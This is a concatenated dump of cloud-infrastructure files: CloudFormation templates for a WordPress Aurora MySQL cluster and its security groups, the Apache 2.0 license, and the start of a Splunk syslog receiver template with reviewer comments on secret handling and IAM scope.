resource_group_name = azurerm_resource_group.demo-rg.name 280 | sku = "PerGB2018" 281 | retention_in_days = 60 282 | } -------------------------------------------------------------------------------- /edge-deployment/templates/rdsaurora.template: -------------------------------------------------------------------------------- 1 | { 2 | "AWSTemplateFormatVersion": "2010-09-09", 3 | "Description": "WordPress RDS Aurora-MySQL Template. 
(qs-1ot302h6n)", 4 | "Parameters": { 5 | "Subnets": { 6 | "ConstraintDescription": "Must be list of existing subnet Ids", 7 | "Description": "At least two existing Subnets in separate Availability Zones in your Virtual Private Cloud (VPC)", 8 | "Type": "List<AWS::EC2::Subnet::Id>" 9 | }, 10 | "AuroraRDSSecurityGroup": { 11 | "Description": "Aurora Security Group", 12 | "Type": "AWS::EC2::SecurityGroup::Id" 13 | }, 14 | "DBAutoMinorVersionUpgrade": { 15 | "AllowedValues": [ 16 | "true", 17 | "false" 18 | ], 19 | "Default": "true", 20 | "Description": "Select true/false to setup Auto Minor Version upgrade", 21 | "Type": "String" 22 | }, 23 | "DBBackupRetentionPeriod": { 24 | "ConstraintDescription": "Database backup retention period must be between 1 and 35 days", 25 | "Default": "7", 26 | "Description": "The number of days for which automatic DB snapshots are retained", 27 | "MaxValue": "35", 28 | "MinValue": "1", 29 | "Type": "Number" 30 | }, 31 | "DBPreferredBackupWindow": { 32 | "AllowedPattern": "^(|([0-1][0-9]|2[0-3]):[0-5][0-9]-([0-1][0-9]|2[0-3]):[0-5][0-9])$", 33 | "ConstraintDescription": "Preferred backup window must be left blank or in the form of HH:MM-HH:MM", 34 | "Default": "", 35 | "Description": "(Optional) Preferred backup window", 36 | "Type": "String" 37 | }, 38 | "DBStorageEncrypted": { 39 | "AllowedValues": [ 40 | "true", 41 | "false" 42 | ], 43 | "Default": "false", 44 | "Description": "Select true/false to enable encryption at rest for the Aurora cluster storage. The default is false; true is recommended. Encryption can only be chosen when the cluster is created - an existing unencrypted cluster cannot be encrypted in place.", 45 | "Type": "String" 46 | }, 47 | "DBInstanceClass": { 48 | "AllowedValues": [ 49 | "db.t2.small", 50 | "db.t2.medium", 51 | "db.t3.small", 52 | "db.t3.medium", 53 | "db.r3.large", 54 | "db.r3.xlarge", 55 | "db.r3.2xlarge", 56 | "db.r3.4xlarge", 57 | "db.r3.8xlarge", 58 | "db.r4.large", 59 | "db.r4.xlarge", 60 | "db.r4.2xlarge", 61 | "db.r4.4xlarge", 62 | "db.r4.8xlarge", 63 | "db.r4.16xlarge", 64 | "db.r5.large", 65 | "db.r5.xlarge", 66 | "db.r5.2xlarge", 67 | "db.r5.4xlarge", 68 | "db.r5.8xlarge", 69 | 
"db.r5.12xlarge", 70 | "db.r5.16xlarge", 71 | "db.r5.24xlarge" 72 | ], 73 | "ConstraintDescription": "Must select a valid database instance type.", 74 | "Default": "db.t3.medium", 75 | "Description": "The name of the compute and memory capacity class of the DB instance. Please check that the selected instance type is available in your region.", 76 | "Type": "String" 77 | }, 78 | "DBName": { 79 | "AllowedPattern": "[a-zA-Z][a-zA-Z0-9]*", 80 | "Default": "QuickstartAuroraDB", 81 | "Description": "Name of Aurora DB for WordPress Stack", 82 | "MaxLength": "64", 83 | "MinLength": "5", 84 | "Type": "String" 85 | }, 86 | "DBMasterUserPassword": { 87 | "AllowedPattern": "(?=\\S)[^@\/\"\\r\\n\\t\\f\\s]*", 88 | "ConstraintDescription": "Min 8 alphanumeric. Cannot contain white space, @, /, \"", 89 | "Description": "The database admin account password (username is 'root').", 90 | "MaxLength": "41", 91 | "MinLength": "8", 92 | "NoEcho": "True", 93 | "Type": "String" 94 | }, 95 | "DBMultiAZ": { 96 | "AllowedValues": [ 97 | "true", 98 | "false" 99 | ], 100 | "Default": "true", 101 | "Description": "Specifies if the database instance is a multiple Availability Zone deployment", 102 | "Type": "String" 103 | } 104 | }, 105 | "Conditions": { 106 | "CreateReadReplica": { 107 | "Fn::Equals": [ 108 | { 109 | "Ref": "DBMultiAZ" 110 | }, 111 | "true" 112 | ] 113 | }, 114 | "EnableStorageEncryption": { 115 | "Fn::Equals": [ 116 | { 117 | "Ref": "DBStorageEncrypted" 118 | }, 119 | "true" 120 | ] 121 | } 122 | }, 123 | "Resources": { 124 | "AuroraDBSubnetGroup": { 125 | "Type": "AWS::RDS::DBSubnetGroup", 126 | "Properties": { 127 | "DBSubnetGroupDescription": "Subnets available for the RDS Aurora DB Instance", 128 | "SubnetIds": { 129 | "Ref": "Subnets" 130 | } 131 | } 132 | }, 133 | "AuroraDBCluster": { 134 | "Type": "AWS::RDS::DBCluster", 135 | "Properties": { 136 | "StorageEncrypted": { 137 | "Fn::If": [ 138 | "EnableStorageEncryption", 139 | true, 140 | { 141 | "Ref": "AWS::NoValue" 142 
| } 143 | ] 144 | }, 145 | "BackupRetentionPeriod": { 146 | "Ref": "DBBackupRetentionPeriod" 147 | }, 148 | "PreferredBackupWindow": { 149 | "Ref": "DBPreferredBackupWindow" 150 | }, 151 | "DBSubnetGroupName": { 152 | "Ref": "AuroraDBSubnetGroup" 153 | }, 154 | "Engine": "aurora-mysql", 155 | "EngineVersion": "5.7", 156 | "MasterUsername": "root", 157 | "MasterUserPassword": { 158 | "Ref": "DBMasterUserPassword" 159 | }, 160 | "VpcSecurityGroupIds": [ 161 | { 162 | "Ref": "AuroraRDSSecurityGroup" 163 | } 164 | ], 165 | "Tags": [ 166 | { 167 | "Key": "Name", 168 | "Value": "WordPress-Aurora-DB-Cluster" 169 | } 170 | ] 171 | } 172 | }, 173 | "AuroraDBPrimaryInstance": { 174 | "Type": "AWS::RDS::DBInstance", 175 | "Properties": { 176 | "Engine": "aurora-mysql", 177 | "EngineVersion": "5.7", 178 | "DBClusterIdentifier": { 179 | "Ref": "AuroraDBCluster" 180 | }, 181 | "DBInstanceClass": { 182 | "Ref": "DBInstanceClass" 183 | }, 184 | "DBSubnetGroupName": { 185 | "Ref": "AuroraDBSubnetGroup" 186 | }, 187 | "AutoMinorVersionUpgrade": { 188 | "Ref": "DBAutoMinorVersionUpgrade" 189 | }, 190 | "Tags": [ 191 | { 192 | "Key": "Name", 193 | "Value": "WordPress-Aurora-PrimaryDB" 194 | } 195 | ] 196 | } 197 | }, 198 | "AuroraDBSecondaryInstance": { 199 | "Type": "AWS::RDS::DBInstance", 200 | "Condition": "CreateReadReplica", 201 | "Properties": { 202 | "Engine": "aurora-mysql", 203 | "EngineVersion": "5.7", 204 | "DBClusterIdentifier": { 205 | "Ref": "AuroraDBCluster" 206 | }, 207 | "DBInstanceClass": { 208 | "Ref": "DBInstanceClass" 209 | }, 210 | "DBSubnetGroupName": { 211 | "Ref": "AuroraDBSubnetGroup" 212 | }, 213 | "AutoMinorVersionUpgrade": { 214 | "Ref": "DBAutoMinorVersionUpgrade" 215 | }, 216 | "Tags": [ 217 | { 218 | "Key": "Name", 219 | "Value": "WordPress-Aurora-SecondaryDB" 220 | } 221 | ] 222 | } 223 | } 224 | }, 225 | "Outputs": { 226 | "AuroraEndPoints": { 227 | "Description": "Aurora Cluster Endpoint to connect", 228 | "Value": { 229 | "Fn::Join": [ 230 | "", 231 
| [ 232 | { 233 | "Fn::GetAtt": [ 234 | "AuroraDBCluster", 235 | "Endpoint.Address" 236 | ] 237 | }, 238 | ":", 239 | { 240 | "Fn::GetAtt": [ 241 | "AuroraDBCluster", 242 | "Endpoint.Port" 243 | ] 244 | }, 245 | "/", 246 | { 247 | "Ref": "DBName" 248 | } 249 | ] 250 | ] 251 | } 252 | }, 253 | "DBName": { 254 | "Description": "Aurora DBName", 255 | "Value": { 256 | "Ref": "DBName" 257 | } 258 | }, 259 | "AuroraEndPointAddress": { 260 | "Description": "Aurora Endpoint to connect", 261 | "Value": { 262 | "Fn::Join": [ 263 | "", 264 | [ 265 | { 266 | "Fn::GetAtt": [ 267 | "AuroraDBCluster", 268 | "Endpoint.Address" 269 | ] 270 | } 271 | ] 272 | ] 273 | } 274 | }, 275 | "AuroraEndPointPort": { 276 | "Description": "Aurora Endpoint to connect", 277 | "Value": { 278 | "Fn::Join": [ 279 | "", 280 | [ 281 | { 282 | "Fn::GetAtt": [ 283 | "AuroraDBCluster", 284 | "Endpoint.Port" 285 | ] 286 | } 287 | ] 288 | ] 289 | } 290 | } 291 | } 292 | } 293 | -------------------------------------------------------------------------------- /edge-deployment/templates/securitygroups.template: -------------------------------------------------------------------------------- 1 | { 2 | "AWSTemplateFormatVersion": "2010-09-09", 3 | "Description": "WordPress Security Groups template. 
(qs-1ot302h6s)", 4 | "Parameters": { 5 | "VPC": { 6 | "Description": "VPC-ID of your existing Virtual Private Cloud (VPC) where you want to depoy RDS", 7 | "Type": "AWS::EC2::VPC::Id" 8 | }, 9 | "VPCCIDR": { 10 | "AllowedPattern": "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\/([0-9]|[1-2][0-9]|3[0-2]))$", 11 | "ConstraintDescription": "Must be a valid IP range in x.x.x.x/x notation", 12 | "Description": "The CIDR block for VPC", 13 | "Type": "String" 14 | }, 15 | "ALBAccessCIDR": { 16 | "AllowedPattern": "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\/([0-9]|[1-2][0-9]|3[0-2]))$", 17 | "ConstraintDescription": "CIDR block parameter must be in the form x.x.x.x/x", 18 | "Description": "Allowed CIDR block for external web access to the Application Load Balancer", 19 | "Type": "String" 20 | }, 21 | "BastionSecurityGroupID": { 22 | "Description": "ID of the Bastion Security Group (e.g., sg-1d2c3b4a)", 23 | "Type": "AWS::EC2::SecurityGroup::Id" 24 | }, 25 | "ElastiCacheEnable":{ 26 | "Description": "Enable ElastiCache", 27 | "AllowedValues": [ 28 | "true", 29 | "false" 30 | ], 31 | "Default": "true", 32 | "Type": "String" 33 | } 34 | }, 35 | "Conditions":{ 36 | "ElastiCacheEnableCondition":{ 37 | "Fn::Equals": [ 38 | { 39 | "Ref": "ElastiCacheEnable" 40 | }, 41 | "true" 42 | ] 43 | } 44 | }, 45 | "Resources": { 46 | "AuroraRDSSecurityGroup": { 47 | "Type": "AWS::EC2::SecurityGroup", 48 | "Properties": { 49 | "GroupDescription": "Allow access to Aurora Port (AWS Quick Start)", 50 | "VpcId": { 51 | "Ref": "VPC" 52 | }, 53 | "SecurityGroupIngress": [ 54 | { 55 | "IpProtocol": "tcp", 56 | "FromPort": 3306, 57 | "ToPort": 3306, 58 | "SourceSecurityGroupId": { 59 | "Fn::GetAtt": [ 60 | "WebServerSecurityGroup", 61 | "GroupId" 62 | ] 63 | } 64 | } 65 | ] 66 | } 67 | }, 68 | "ALBSecurityGroup": { 69 | "Type": "AWS::EC2::SecurityGroup", 70 | "Properties": 
{ 71 | "GroupDescription": "ELB Security Group (AWS Quick Start)", 72 | "VpcId": { 73 | "Ref": "VPC" 74 | }, 75 | "SecurityGroupIngress": [ 76 | { 77 | "IpProtocol": "tcp", 78 | "FromPort": 80, 79 | "ToPort": 80, 80 | "CidrIp": { "Ref": "ALBAccessCIDR" } 81 | }, 82 | { 83 | "IpProtocol": "tcp", 84 | "FromPort": 443, 85 | "ToPort": 443, 86 | "CidrIp": { "Ref": "ALBAccessCIDR" } 87 | } 88 | ], 89 | "SecurityGroupEgress": [ 90 | { 91 | "IpProtocol": "tcp", 92 | "FromPort": 80, 93 | "ToPort": 80, 94 | "CidrIp": "0.0.0.0/0" 95 | }, 96 | { 97 | "IpProtocol": "tcp", 98 | "FromPort": 443, 99 | "ToPort": 443, 100 | "CidrIp": "0.0.0.0/0" 101 | } 102 | ] 103 | } 104 | }, 105 | "WebServerSecurityGroup": { 106 | "Type": "AWS::EC2::SecurityGroup", 107 | "Properties": { 108 | "GroupDescription": "App Server Security Group (AWS Quick Start)", 109 | "VpcId": { 110 | "Ref": "VPC" 111 | }, 112 | "SecurityGroupIngress": [ 113 | { 114 | "IpProtocol": "tcp", 115 | "FromPort": 22, 116 | "ToPort": 22, 117 | "SourceSecurityGroupId": { 118 | "Ref": "BastionSecurityGroupID" 119 | } 120 | }, 121 | { 122 | "IpProtocol": "tcp", 123 | "FromPort": 443, 124 | "ToPort": 443, 125 | "SourceSecurityGroupId": { 126 | "Fn::GetAtt": [ 127 | "ALBSecurityGroup", 128 | "GroupId" 129 | ] 130 | } 131 | }, 132 | { 133 | "IpProtocol": "tcp", 134 | "FromPort": 80, 135 | "ToPort": 80, 136 | "SourceSecurityGroupId": { 137 | "Fn::GetAtt": [ 138 | "ALBSecurityGroup", 139 | "GroupId" 140 | ] 141 | } 142 | } 143 | ], 144 | "SecurityGroupEgress": [ 145 | { 146 | "IpProtocol": "tcp", 147 | "FromPort": 80, 148 | "ToPort": 80, 149 | "CidrIp": "0.0.0.0/0" 150 | }, 151 | { 152 | "IpProtocol": "tcp", 153 | "FromPort": 443, 154 | "ToPort": 443, 155 | "CidrIp": "0.0.0.0/0" 156 | } 157 | ] 158 | } 159 | }, 160 | "EFSSecurityGroup": { 161 | "Type": "AWS::EC2::SecurityGroup", 162 | "Properties": { 163 | "GroupDescription": "EFS Security Group", 164 | "VpcId": { 165 | "Ref": "VPC" 166 | }, 167 | "SecurityGroupIngress": [ 168 | { 
169 | "IpProtocol": "tcp", 170 | "FromPort": 2049, 171 | "ToPort": 2049, 172 | "CidrIp": { 173 | "Ref": "VPCCIDR" 174 | } 175 | } 176 | ] 177 | } 178 | }, 179 | "ElastiCacheSecurityGroup": { 180 | "Type": "AWS::EC2::SecurityGroup", 181 | "Condition": "ElastiCacheEnableCondition", 182 | "Properties": { 183 | "GroupDescription": "Allow access to ElastiCache-Memcached Port (AWS Quick Start)", 184 | "VpcId": { 185 | "Ref": "VPC" 186 | }, 187 | "SecurityGroupIngress": [ 188 | { 189 | "IpProtocol": "tcp", 190 | "FromPort": 11211, 191 | "ToPort": 11211, 192 | "SourceSecurityGroupId": { 193 | "Fn::GetAtt": [ 194 | "WebServerSecurityGroup", 195 | "GroupId" 196 | ] 197 | } 198 | } 199 | ] 200 | } 201 | }, 202 | "SecurityGroupRuleElastiCache": { 203 | "Type": "AWS::EC2::SecurityGroupEgress", 204 | "Condition": "ElastiCacheEnableCondition", 205 | "Properties": { 206 | "IpProtocol": "tcp", 207 | "FromPort": 11211, 208 | "ToPort": 11211, 209 | "DestinationSecurityGroupId": { 210 | "Fn::GetAtt": [ 211 | "ElastiCacheSecurityGroup", 212 | "GroupId" 213 | ] 214 | }, 215 | "GroupId": { 216 | "Fn::GetAtt": [ 217 | "WebServerSecurityGroup", 218 | "GroupId" 219 | ] 220 | } 221 | } 222 | }, 223 | "SecurityGroupRuleAppDB": { 224 | "Type": "AWS::EC2::SecurityGroupEgress", 225 | "Properties": { 226 | "IpProtocol": "tcp", 227 | "FromPort": 3306, 228 | "ToPort": 3306, 229 | "DestinationSecurityGroupId": { 230 | "Fn::GetAtt": [ 231 | "AuroraRDSSecurityGroup", 232 | "GroupId" 233 | ] 234 | }, 235 | "GroupId": { 236 | "Fn::GetAtt": [ 237 | "WebServerSecurityGroup", 238 | "GroupId" 239 | ] 240 | } 241 | } 242 | }, 243 | "SecurityGroupRuleAppEFS": { 244 | "Type": "AWS::EC2::SecurityGroupEgress", 245 | "Properties": { 246 | "IpProtocol": "tcp", 247 | "FromPort": 2049, 248 | "ToPort": 2049, 249 | "DestinationSecurityGroupId": { 250 | "Fn::GetAtt": [ 251 | "EFSSecurityGroup", 252 | "GroupId" 253 | ] 254 | }, 255 | "GroupId": { 256 | "Fn::GetAtt": [ 257 | "WebServerSecurityGroup", 258 | "GroupId" 259 
| ] 260 | } 261 | } 262 | } 263 | }, 264 | "Outputs": { 265 | "AuroraRDSSecurityGroup": { 266 | "Description": "Aurora Security Group", 267 | "Value": { 268 | "Ref": "AuroraRDSSecurityGroup" 269 | } 270 | }, 271 | "ALBSecurityGroup": { 272 | "Description": "ELB Security Group", 273 | "Value": { 274 | "Ref": "ALBSecurityGroup" 275 | } 276 | }, 277 | "WebServerSecurityGroup": { 278 | "Description": "Web Server Security Group", 279 | "Value": { 280 | "Ref": "WebServerSecurityGroup" 281 | } 282 | }, 283 | "EFSSecurityGroup": { 284 | "Description": "EFS Security Group", 285 | "Value": { 286 | "Ref": "EFSSecurityGroup" 287 | } 288 | }, 289 | "ElastiCacheSecurityGroup": { 290 | "Description": "ElastiCache Security Group", 291 | "Value": { 292 | "Fn::If":[ 293 | "ElastiCacheEnableCondition", 294 | {"Ref": "ElastiCacheSecurityGroup"}, 295 | "" 296 | ] 297 | } 298 | } 299 | } 300 | } 301 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. 
For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 
47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
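We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.

Copyright {yyyy} {name of copyright owner}

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

--------------------------------------------------------------------------------
/centralized-with-gwlb/templates/splunk.yaml:
--------------------------------------------------------------------------------
AWSTemplateFormatVersion: 2010-09-09
# Splunk receiver for NSVA syslog events:
#   * a custom-resource Lambda peers the base VPC with the NSVA security VPC
#     and adds routes on both sides of the peering,
#   * a single public EC2 instance runs Splunk in docker, reachable on 8000
#     (web UI) from AllowIP and on SyslogPort from the security VPC CIDR.

Parameters:
  # ------------------------------------------------------------#
  # Import Master.yaml template
  # ------------------------------------------------------------#
  AllowIP:
    Description: CIDR (x.x.x.x/x, normally a single /32) of the terminal allowed to reach the Splunk web UI on port 8000
    Type: String
    # The value is used verbatim as a security-group CidrIp, so enforce CIDR
    # notation up front (same pattern the other templates in this repo use).
    # A bare IP or an empty string would otherwise only fail at SG creation.
    AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/([0-9]|[1-2][0-9]|3[0-2]))$
    ConstraintDescription: Must be a valid IP range in x.x.x.x/x notation
  SyslogPort:
    Description: TCP port Splunk listens on for NSVA syslog; opened from SecurityVPCCIDR and published by the container
    Type: Number
    MinValue: 1
    MaxValue: 65535
  SecurityVPCCIDR:
    Description: Specify the CIDR of the VPC where you want to deploy the NSVA
    Type: String
  ImageId:
    Description: Enter the AMI ID of the EC2 instance.
    Type: String
  SplunkPassword:
    Description: Admin password for the Splunk container
    Type: String
    # Keep the secret out of DescribeStacks / console / change-set output.
    # NOTE: the value is still embedded in the instance UserData (see the
    # Splunk resource), which any process on the box can read from the
    # instance metadata service and anyone with ec2:DescribeInstanceAttribute
    # can read from the API. Pulling it from Secrets Manager / SSM Parameter
    # Store at boot would be the proper fix.
    NoEcho: true
  SplunkVersion:
    Description: Tag of the splunk/splunk docker image to run
    Type: String
    # Interpolated into the UserData shell script, which runs as root;
    # restrict to the characters a docker tag may contain so the parameter
    # cannot carry shell metacharacters.
    AllowedPattern: ^[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}$
    ConstraintDescription: must be a valid docker image tag (letters, digits, '_', '.', '-')
  NeedSSMAccess:
    Description: If enabled, SSM access to the instance will be available.
    Type: String
    AllowedValues: [true, false]
  c1nsStackName:
    Description: Stack Name of the c1ns security vpc template
    Type: String
  # ------------------------------------------------------------#
  # Import BaseVPC stack(aws-vpc.template.yaml file)
  # ------------------------------------------------------------#
  VPCID:
    Description: Enter the VPC ID where you want to deploy the Splunk
    Type: String
  VPCCIDR:
    Description: Enter the VPC CIDR where you want to deploy the Splunk
    Type: String
  # ------------------------------------------------------------#
  # Import BaseSite stack(BaseSite.yaml file)
  # ------------------------------------------------------------#
  InstanceProfile:
    Description: Instance profile to be used for SSM access
    Type: String
  # ------------------------------------------------------------#
  # Import ModifyRTTemplate stack(last.yaml file)
  # ------------------------------------------------------------#
  RTID:
    Description: Enter the Route Table ID where you want to deploy the Splunk
    Type: String
  PublicSubnet1ID:
    Description: Enter the Public Subnet ID where you want to deploy the Splunk
    Type: String

# ------------------------------------------------------------#
# Conditions
# ------------------------------------------------------------#
Conditions:
  NeedSSM: !Equals ["true", !Ref NeedSSMAccess]

Resources:
  # ------------------------------------------------------------#
  # Create Lambda for VPC peering and modify route table
  # ------------------------------------------------------------#
  CreateVPCpeeringLambdaRole:
    Type: AWS::IAM::Role
    Properties:
      Path: /
      # Select 2 assumes the nested-stack name shape Parent-LogicalId-Suffix.
      RoleName: !Join ['', [!Select [2, !Split ['-', !Ref AWS::StackName]], '-CreateVPCpeeringLambdaRole']]
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Effect: Allow
            Principal:
              Service: [lambda.amazonaws.com]
            Action: [sts:AssumeRole]
      MaxSessionDuration: 3600
      ManagedPolicyArns:
        - arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole
        - !Ref CreateVPCpeeringLambdaPolicy

  CreateVPCpeeringLambdaPolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
      ManagedPolicyName: !Join ['', [!Select [2, !Split ['-', !Ref AWS::StackName]], '-CreateVPCpeeringLambdaPolicy']]
      Path: /
      PolicyDocument:
        Version: 2012-10-17
        Statement:
          # NOTE(review): the ec2:Describe* actions need "*", but the route,
          # peering and tag actions support resource-level ARNs and could be
          # scoped to the two VPCs / route tables involved. As written, the
          # function may add or remove routes in any route table of the account.
          - Effect: Allow
            Action:
              - ec2:DeleteTags
              - ec2:AcceptVpcPeeringConnection
              - ec2:DescribeVpcs
              - ec2:CreateRoute
              - ec2:DeleteVpcPeeringConnection
              - ec2:CreateTags
              - ec2:DescribeVpcPeeringConnections
              - ec2:DeleteRoute
              - ec2:CreateVpcPeeringConnection
              - ec2:DescribeRouteTables
            Resource: "*"

  CreateVPCpeeringLambdaFunction:
    Type: AWS::Lambda::Function
    Properties:
      # Custom-resource handler. Create: peer the base VPC with the VPC of the
      # c1ns stack and route both sides. Delete: undo that, tolerating pieces
      # that are already gone so stack deletion is never blocked.
      Code:
        ZipFile: |
          import boto3, logging, os
          import cfnresponse
          from botocore.exceptions import ClientError
          logger = logging.getLogger()
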